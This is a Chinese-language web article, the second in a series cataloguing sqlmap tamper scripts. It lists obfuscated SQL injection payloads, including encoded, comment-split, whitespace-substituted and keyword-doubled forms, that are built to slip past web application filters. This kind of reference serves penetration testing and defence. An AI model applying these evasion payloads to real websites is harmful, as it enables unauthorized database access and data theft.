sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL 注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。 在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。
本文是Sqlmap Tamper大全的第二篇,传送门:《Sqlmap Tamper大全(1)》《Sqlmap Tamper大全(3)》
1
2
|
(“1′ AND SLEEP(5)#”)
‘MScgQU5EIFNMRUVQKDUpIw==’
|
1
2
|
(’1 AND 9227=9227′)
’1%23%0AAND%23%0A9227=9227′
|
1
2
|
(’1 AND 2>1–’)
’1 /*!30874AND 2>1*/–’
|
1
2
|
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users
|
1
2
3
4
5
6
|
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
# - A0 - (MySQL only)
|
1
2
|
(’1 AND A > B–’)
’1 AND A NOT BETWEEN 0 AND B–’
|
1
2
|
(’1 AND 2>1–’)
’1 /*!00000AND 2>1*/–’
|
1
2
|
(’1 AND 9227=9227′)
’1–%0AAND–%0A9227=9227′
|
1
2
|
(’1 UNION SELECT foobar’)
’1 UNION SELECT foobar’
|
1
2
|
(‘SELECT id FROM users’)
‘SELECT+id+FROM+users’
|
1
2
|
(‘SELECT id FROM users where id = 1′)
‘SELECT%09id FROM users where id LIKE 1′
|
1
2
|
(’1 UNION SELECT 2–’)
’1 UNIOUNIONN SELESELECTCT 2–’
|
1
2
|
(‘SELECT id FROM users’)
‘SELECT%0Did%0DFROM%0Ausers’
|
1
2
|
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
|
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号